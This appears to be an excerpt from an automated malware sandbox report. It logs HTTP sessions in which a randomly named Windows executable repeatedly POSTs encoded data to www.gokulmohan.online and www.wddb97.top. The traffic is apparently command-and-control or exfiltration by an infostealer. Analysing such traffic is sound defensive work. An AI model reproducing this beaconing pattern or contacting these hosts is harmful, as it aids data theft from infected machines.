Nov 5, 2024 07:12:39.782561064 CET	1236	IN	HTTP/1.1 403 Forbidden Date: Tue, 05 Nov 2024 06:12:39 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin Cross-Origin-Opener-Policy: same-origin cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1WJZp4kAxQSXq5LqPsqRKFgwlCl5Ji%2BADb33SQ9d9IJ35CVFIFam6bw9vvlA7U32MEOdM9Nv%2FLq%2BoEwqbw2Fzpov3Cp9hKg8lh4pSit9isLvhUws1n42HUnPABrhGDTlQqT%2FRh160yc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddab180eb120bd9-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1319&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=720&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98 cd f6 02 2c Data Ascii: 581Vmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?,
Nov 5, 2024 07:12:39.782696962 CET	1143	IN	Data Raw: a5 5a c1 2d e4 d6 49 74 d3 dc 12 d9 66 7e d8 de 80 b7 5a 49 38 90 52 0e e6 f5 61 7f da 74 8d aa aa 69 6e ac 6b 84 1e d2 1a 9c 93 a7 d8 ec b8 f8 56 98 c1 cf ab 2f 38 3f 9a 3d da 82 39 3a 3a 3a fe 61 c8 e8 7e a0 4c 69 19 dd 4e 2e e5 11 ff ed 5b 74 Data Ascii: Z-Itf~ZI8RatinkV/8?=9:::a~LiN.[tn,y6\|4m^)6}k=eYlMR<@_L`N54f9,0%pd\OgO~ak'o/`""+(z[G(,mQ`;#SC!Bt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49968	172.67.185.22	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:12:41.212157965 CET	740	OUT	POST /xh7d/ HTTP/1.1 Host: www.gokulmohan.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 222 Content-Type: application/x-www-form-urlencoded Origin: http://www.gokulmohan.online Referer: http://www.gokulmohan.online/xh7d/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 6f 5a 4c 58 32 59 51 76 4a 2f 68 50 62 4c 39 63 6c 45 65 43 34 36 63 56 7a 6b 77 70 65 42 55 2f 36 57 4a 6d 38 51 74 73 34 2b 34 32 49 74 32 50 6c 37 53 6d 30 67 6a 41 4d 36 66 78 42 39 36 72 4e 2f 61 4a 56 34 44 4f 52 6f 32 71 58 4e 50 41 54 72 72 52 72 31 2b 38 72 64 77 41 66 4f 46 6a 64 6b 50 42 48 6e 71 58 6e 66 54 4b 4a 4c 54 4a 69 44 73 66 6a 59 66 57 70 58 56 6b 7a 79 34 48 68 5a 46 43 35 45 50 35 35 6e 6e 4d 6a 78 68 64 55 33 62 78 42 75 41 44 6d 53 71 45 32 32 46 59 37 2b 50 39 32 33 35 48 2b 64 6e 63 67 2f 41 59 56 54 67 64 34 74 56 73 39 4b 6c 72 6d 79 56 47 41 51 54 43 4e 41 68 34 6b 59 4a 52 63 79 6d 63 4b 4d 68 6a 54 5a 41 3d Data Ascii: FLL4t=oZLX2YQvJ/hPbL9clEeC46cVzkwpeBU/6WJm8Qts4+42It2Pl7Sm0gjAM6fxB96rN/aJV4DORo2qXNPATrrRr1+8rdwAfOFjdkPBHnqXnfTKJLTJiDsfjYfWpXVkzy4HhZFC5EP55nnMjxhdU3bxBuADmSqE22FY7+P9235H+dncg/AYVTgd4tVs9KlrmyVGAQTCNAh4kYJRcymcKMhjTZA=
Nov 5, 2024 07:12:42.367645979 CET	1236	IN	HTTP/1.1 403 Forbidden Date: Tue, 05 Nov 2024 06:12:42 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin Cross-Origin-Opener-Policy: same-origin cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oZ6gtaDp2SVJl20PphZrcEGUBxbF467kJw%2F4sWqIyTe%2FcA8UtiyTrbWhqmMJvN48aFRWjT30om8Yog7n85MeepGVlrKIp6to5XXmrBpQwmv2l47NnxCbTeQ6n%2F0oDjPA%2BW12HxtRAQc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddab190fc50e916-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1065&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98 cd f6 02 2c Data Ascii: 58cVmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?,
Nov 5, 2024 07:12:42.367664099 CET	1138	IN	Data Raw: a5 5a c1 2d e4 d6 49 74 d3 dc 12 d9 66 7e d8 de 80 b7 5a 49 38 90 52 0e e6 f5 61 7f da 74 8d aa aa 69 6e ac 6b 84 1e d2 1a 9c 93 a7 d8 ec b8 f8 56 98 c1 cf ab 2f 38 3f 9a 3d da 82 39 3a 3a 3a fe 61 c8 e8 7e a0 4c 69 19 dd 4e 2e e5 11 ff ed 5b 74 Data Ascii: Z-Itf~ZI8RatinkV/8?=9:::a~LiN.[tn,y6\|4m^)6}k=eYlMR<@_L`N54f9,0%pd\OgO~ak'o/`""+(z[G(,mQ`;#SC!Bt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49983	172.67.185.22	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:12:43.754673004 CET	10822	OUT	POST /xh7d/ HTTP/1.1 Host: www.gokulmohan.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 10302 Content-Type: application/x-www-form-urlencoded Origin: http://www.gokulmohan.online Referer: http://www.gokulmohan.online/xh7d/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 6f 5a 4c 58 32 59 51 76 4a 2f 68 50 62 4c 39 63 6c 45 65 43 34 36 63 56 7a 6b 77 70 65 42 55 2f 36 57 4a 6d 38 51 74 73 34 39 59 32 4a 62 4b 50 6d 59 36 6d 33 67 6a 41 53 71 66 79 42 39 36 36 4e 38 71 4e 56 34 50 65 52 75 79 71 47 66 48 41 59 36 72 52 6b 31 2b 38 33 74 77 46 62 4f 46 32 64 6b 65 4b 48 6e 36 58 6e 66 54 4b 4a 4b 6a 4a 6d 52 49 66 77 49 66 58 73 58 56 34 35 53 34 76 68 5a 4e 38 35 45 4c 48 2b 54 62 4d 6a 56 46 64 53 42 76 78 64 2b 41 42 68 53 72 44 32 32 4a 62 37 2f 6a 6d 32 33 6c 74 2b 61 76 63 6a 35 68 43 58 68 49 79 68 75 31 39 6d 74 39 58 75 69 74 58 49 6a 6e 6f 63 79 78 73 39 39 70 66 52 43 72 6f 65 66 78 56 4f 63 4e 55 4f 44 4b 72 56 4c 31 4f 4e 34 6a 61 6e 69 50 74 66 74 35 61 76 38 51 64 57 2b 4d 46 6b 6f 6e 73 65 78 6f 4b 62 4f 4e 41 57 71 5a 61 2b 65 36 63 4a 4e 34 6f 65 6b 6d 79 59 63 45 64 6d 37 35 61 6d 34 43 39 75 70 46 33 4f 43 6d 41 67 74 66 71 34 30 78 45 75 65 34 43 77 64 52 45 6a 74 39 6b 34 6a 69 73 46 58 4e 6f 65 44 2b 2f 78 44 33 71 45 34 41 33 [TRUNCATED] Data Ascii: FLL4t=oZLX2YQvJ/hPbL9clEeC46cVzkwpeBU/6WJm8Qts49Y2JbKPmY6m3gjASqfyB966N8qNV4PeRuyqGfHAY6rRk1+83twFbOF2dkeKHn6XnfTKJKjJmRIfwIfXsXV45S4vhZN85ELH+TbMjVFdSBvxd+ABhSrD22Jb7/jm23lt+avcj5hCXhIyhu19mt9XuitXIjnocyxs99pfRCroefxVOcNUODKrVL1ON4janiPtft5av8QdW+MFkonsexoKbONAWqZa+e6cJN4oekmyYcEdm75am4C9upF3OCmAgtfq40xEue4CwdREjt9k4jisFXNoeD+/xD3qE4A3o5xWoNc2nHDHrqdqzubCHXOurRxcxbFXzsn7FomWGbQ0qiV8vQwtxy8nGQ55bUMx20EYI/poMnKeMo5nuf0MdUVGtukZZrAmPf9fmfb5+UsvcZermZImIg9CTw/Hb/CdZZX++/balLGVy3+Vb92YUc4iLeDndeusTPnjEgHgGR9G6+Iv5dscxyI6aZ1NMUeZGJ2sMvGxDB4wcbUHVTOsTUsOqnMf83pWahn6tGJ+B6hnc/xvfnlfp5OnLjywKjk2cRf2y9xyklG7wNI8jxkKJgc5kZg6cvivGZp/nCcFr+8NZVtYvZGA0tuu8Wt4Zk8cxN9BoLHdhZiT9GSBEGD46A8oxrvtIJKeA2RfCGEne2CO1COmbeHtEJ+x+HiUH9UXgIIcXVd2Uq0ClprtlNdnsgXPbZm+AGFnwL0RmsMuC54lD1bK+jAYLuPCvyxKPrQ0bHByZYYvb4GyArGQ6AIJTdBjMYK01bZTn7vetZPuypRq3j5LS+kObZw0YQlcpI8k7L5WYr+IXWOjqs4QLSP6nrt7e5nWfeDdyQwePK0kGJTfUKCO/w67rCEuSzuTs4YgkEj+Aupj2vOnkfHPUR/L8qGGac5f/OEyNFNJhBZpsvFOI2K+9nNLYSeFOt1uNid1D0815N6Q/3oWBHVByfSqcR0ZsoGibVVdnb [TRUNCATED]
Nov 5, 2024 07:12:44.910484076 CET	1236	IN	HTTP/1.1 403 Forbidden Date: Tue, 05 Nov 2024 06:12:44 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin Cross-Origin-Opener-Policy: same-origin cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=svvEtT2il9XQzcq%2FqHj5l7fPOl9ctjDSU4eEgC1lnESotmu%2BO4w1nR8Yfze1KpHd3hvts%2BOfx1c4%2FvLtF1p9sr8gC4ChlxmfOBKhD9TBFxPnsc10inPTbKLim59vRp1aem9RP5OClBc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddab1a0ef213ace-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1308&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10822&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98 cd Data Ascii: 58cVmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?
Nov 5, 2024 07:12:44.910964966 CET	1141	IN	Data Raw: f6 02 2c a5 5a c1 2d e4 d6 49 74 d3 dc 12 d9 66 7e d8 de 80 b7 5a 49 38 90 52 0e e6 f5 61 7f da 74 8d aa aa 69 6e ac 6b 84 1e d2 1a 9c 93 a7 d8 ec b8 f8 56 98 c1 cf ab 2f 38 3f 9a 3d da 82 39 3a 3a 3a fe 61 c8 e8 7e a0 4c 69 19 dd 4e 2e e5 11 ff Data Ascii: ,Z-Itf~ZI8RatinkV/8?=9:::a~LiN.[tn,y6\|4m^)6}k=eYlMR<@_L`N54f9,0%pd\OgO~ak'o/`""+(z[G(,mQ`;#SC!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49995	172.67.185.22	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:12:46.306076050 CET	450	OUT	GET /xh7d/?ezK=xFOxVPb0UzRXXPy&FLL4t=lbj31sdPKdIucqFOkkGE3KM3+04tAjUV11hc/ilEwtgrKZz4woi/xCbjO8SSPcCwKsmvKoPyP7HvBY60bpiIs0q+jugQSLxZIHi4ORfVnf3fP4vxqk9k0cQ= HTTP/1.1 Host: www.gokulmohan.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Nov 5, 2024 07:12:47.426223040 CET	1236	IN	HTTP/1.1 404 Not Found Date: Tue, 05 Nov 2024 06:12:47 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin Cross-Origin-Opener-Policy: same-origin cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l6Fck%2FoEhQQG2BxIAyh2CfF1AWwDyVFnpLjBxd7A96CkS2EyEoZnIkyPhkdrmyf2PuuWKOsQdOIBPUEzxRg13CM5MryaBHF4R%2B3ayPm0NLbSbKsgBKdaR%2BLk9Ivq%2B3ajtO%2BRggpap8s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddab1b0bff547ac-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2324&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=450&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 63 61 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 61 74 20 2f 78 68 37 64 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 4e 45 2c 4e 4f 41 52 43 48 49 56 45 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 68 74 6d 6c 20 2a 20 7b 20 70 61 64 64 69 6e 67 3a 30 3b 20 6d 61 72 67 69 6e 3a 30 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 2a 20 7b 20 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 2a 20 2a 20 7b 20 Data Ascii: ca6<!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <title>Page not found at /xh7d/</title> <meta name="robots" content="NONE,NOARCHIVE"> <style type="text/css"> html * { padding:0; margin:0; } body * { padding:10px 20px; } body * * {
Nov 5, 2024 07:12:47.426237106 CET	1236	IN	Data Raw: 70 61 64 64 69 6e 67 3a 30 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 3a 73 6d 61 6c 6c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 65 65 65 3b 20 63 6f 6c 6f 72 3a 23 30 30 30 3b 20 7d 0a 20 20 20 20 Data Ascii: padding:0; } body { font:small sans-serif; background:#eee; color:#000; } body>div { border-bottom:1px solid #ddd; } h1 { font-weight:normal; margin-bottom:.4em; } h1 span { font-size:60%; color:#666; font-weight:normal; }
Nov 5, 2024 07:12:47.426246881 CET	424	IN	Data Raw: 6f 50 79 50 37 48 76 42 59 36 30 62 70 69 49 73 30 71 2b 6a 75 67 51 53 4c 78 5a 49 48 69 34 4f 52 66 56 6e 66 33 66 50 34 76 78 71 6b 39 6b 30 63 51 3d 3c 2f 74 64 3e 0a 20 20 20 20 20 20 3c 2f 74 72 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 Data Ascii: oPyP7HvBY60bpiIs0q+jugQSLxZIHi4ORfVnf3fP4vxqk9k0cQ=</td> </tr> <tr> <th>Raised by:</th> <td>django.views.static.serve</td> </tr> </table> </div> <div id="info"> <p> Using
Nov 5, 2024 07:12:47.426364899 CET	1236	IN	Data Raw: 20 20 61 64 6d 69 6e 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 Data Ascii: admin/ </li> <li> </li> <li>
Nov 5, 2024 07:12:47.426374912 CET	38	IN	Data Raw: 20 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: </p> </div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50020	206.119.82.172	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:12:53.019594908 CET	699	OUT	POST /a3g3/ HTTP/1.1 Host: www.wddb97.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 202 Content-Type: application/x-www-form-urlencoded Origin: http://www.wddb97.top Referer: http://www.wddb97.top/a3g3/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 39 45 62 79 4e 72 61 76 48 66 56 4f 54 52 51 66 50 44 69 33 76 54 74 64 4b 6e 73 4f 6f 66 71 46 6f 4e 32 44 5a 68 30 67 67 2b 6a 68 5a 73 71 32 71 31 7a 65 70 4f 41 76 45 62 39 73 5a 6a 32 7a 78 61 79 42 37 6d 61 2b 55 31 55 46 41 6e 70 6f 62 6d 64 6c 4b 30 55 68 38 48 31 30 41 4b 50 79 47 6b 33 79 4c 4f 2b 7a 53 58 71 46 36 37 67 34 69 4c 6d 47 48 59 56 6a 64 51 4b 7a 5a 70 36 58 55 38 6f 45 33 36 2f 6a 64 71 67 41 34 4f 6c 6d 47 45 49 47 58 50 77 2b 34 7a 50 2b 63 53 51 64 63 45 4d 31 72 4f 4e 48 55 6a 74 54 34 57 7a 70 39 5a 75 35 41 64 54 70 44 76 62 65 77 6f 59 70 74 67 3d 3d Data Ascii: FLL4t=9EbyNravHfVOTRQfPDi3vTtdKnsOofqFoN2DZh0gg+jhZsq2q1zepOAvEb9sZj2zxayB7ma+U1UFAnpobmdlK0Uh8H10AKPyGk3yLO+zSXqF67g4iLmGHYVjdQKzZp6XU8oE36/jdqgA4OlmGEIGXPw+4zP+cSQdcEM1rONHUjtT4Wzp9Zu5AdTpDvbewoYptg==
Nov 5, 2024 07:12:53.960299015 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 05 Nov 2024 06:12:53 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66aa3a46-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50021	206.119.82.172	80	1076	C:\Program Files (x86)\gCbqMwAHQyGkjJuRoNtepDpWzjIqgSpOtqHdzKymcEwtulRoMiIMNUKqIrUojiXQASccnbXpcHVWTHgt\gdWgEHryJDTaS.exe

Timestamp	Bytes transferred	Direction	Data
Nov 5, 2024 07:12:55.572288036 CET	719	OUT	POST /a3g3/ HTTP/1.1 Host: www.wddb97.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Cache-Control: no-cache Connection: close Content-Length: 222 Content-Type: application/x-www-form-urlencoded Origin: http://www.wddb97.top Referer: http://www.wddb97.top/a3g3/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 Data Raw: 46 4c 4c 34 74 3d 39 45 62 79 4e 72 61 76 48 66 56 4f 4a 77 67 66 4e 6b 4f 33 6a 6a 74 65 57 33 73 4f 68 2f 72 4f 6f 4e 36 44 5a 6a 59 77 67 4d 33 68 5a 4d 61 32 70 33 4c 65 6c 75 41 76 63 72 39 31 47 7a 33 39 78 61 2f 38 37 6a 36 2b 55 31 77 46 41 69 74 6f 62 58 64 6d 4c 6b 55 6a 7a 6e 31 32 59 71 50 79 47 6b 33 79 4c 4f 71 5a 53 58 79 46 35 49 34 34 6a 71 6d 46 47 59 56 67 61 51 4b 7a 64 70 36 62 55 38 70 68 33 37 54 46 64 70 49 41 34 4c 42 6d 49 31 4a 30 43 2f 77 38 79 54 4f 73 53 7a 39 4b 52 56 70 4e 30 66 78 36 64 67 46 4f 35 51 2b 7a 73 6f 50 75 53 64 33 61 65 6f 53 71 39 72 6c 67 32 72 68 73 63 30 54 33 44 39 55 6a 62 4d 30 43 78 33 45 62 4f 64 77 3d Data Ascii: FLL4t=9EbyNravHfVOJwgfNkO3jjteW3sOh/rOoN6DZjYwgM3hZMa2p3LeluAvcr91Gz39xa/87j6+U1wFAitobXdmLkUjzn12YqPyGk3yLOqZSXyF5I44jqmFGYVgaQKzdp6bU8ph37TFdpIA4LBmI1J0C/w8yTOsSz9KRVpN0fx6dgFO5Q+zsoPuSd3aeoSq9rlg2rhsc0T3D9UjbM0Cx3EbOdw=
